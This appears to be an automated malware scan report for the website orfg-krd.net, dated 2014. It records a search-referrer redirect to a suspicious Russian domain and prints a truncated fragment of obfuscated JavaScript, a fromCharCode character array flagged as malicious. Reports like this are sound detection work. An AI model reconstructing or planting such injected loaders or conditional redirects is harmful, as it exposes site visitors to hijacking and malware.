Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.orfg-krd.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.orfg-krd.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=1209600 Connection: close Date: Sun, 31 Aug 2014 05:03:26 GMT Location: http://homedics-russia.ru/clik.php Server: Apache Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Sep 2014 05:03:26 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.orfg-krd.net/ | 503 Service Unavailable Content-Length: 7668 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
http://www.orfg-krd.net/misc/jquery.js?0 | 200 OK Content-Length: 84362 Content-Type: application/javascript | clean |
http://www.orfg-krd.net/misc/drupal.js?0 | 200 OK Content-Length: 9834 Content-Type: application/javascript | clean |
http://www.orfg-krd.net/test404page.js | 503 Service Unavailable Content-Length: 7668 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=orfg-krd.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://orfg-krd.net/
Result: orfg-krd.net is not infected or malware details are not published yet.